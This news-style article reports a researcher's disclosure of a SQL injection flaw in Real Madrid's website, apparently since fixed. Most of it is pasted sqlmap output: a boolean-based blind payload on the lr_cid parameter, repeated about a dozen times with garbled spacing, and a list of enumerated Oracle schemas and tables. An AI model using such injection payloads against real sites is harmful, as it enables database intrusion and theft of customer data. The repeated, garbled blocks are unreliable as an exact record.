A Greek researcher managed to identify a major security gap in Real Madrid's official website, which allowed him to perform a successful SQL injection and gain access to base group data.
On October 10, the Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
The cooperation was flawless and immediate and the problem was fixed within a few hours.
It is worth noting that the base of the website had over 7.000 tables and many important ones data such as millions of customer accounts from the team's official store.
Some vulnerability information:
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c=RM_Noticia_FA&lr_cid=-8384 OR 8642=8642&lr_language=de&lr_pid=3&pagename=RealMadridResponsive/Comunes/Logica/urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table] + ——————————– +
| RLM $ PARSEDCOND |
+ ——————————– +
Database: XDB
[2 tables] + ——————————– +
| XDB $ IMPORT_TT_INFO |
| XDB $ XIDX_IMP_T |
+ ——————————– +
Database: APEX_030200
[3 tables] + ——————————– +
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+ ——————————– +
Database: SYSTEM
[4 tables] + ——————————– +
| HELP |
| OL $ |
| OL $ HINTS |
| OL $ NODES |
+ ——————————– +
Database: FATWIREDLV
[3437 tables] + ——————————– +
Database: SYS
[26 tables] + ——————————– +
Database: MDSYS
[35 tables] + ——————————– +
Awareness of vulnerabilities discovered in organizations is considered extremely necessary
(especially when they are on high traffic websites), and for us they are an immediate priority.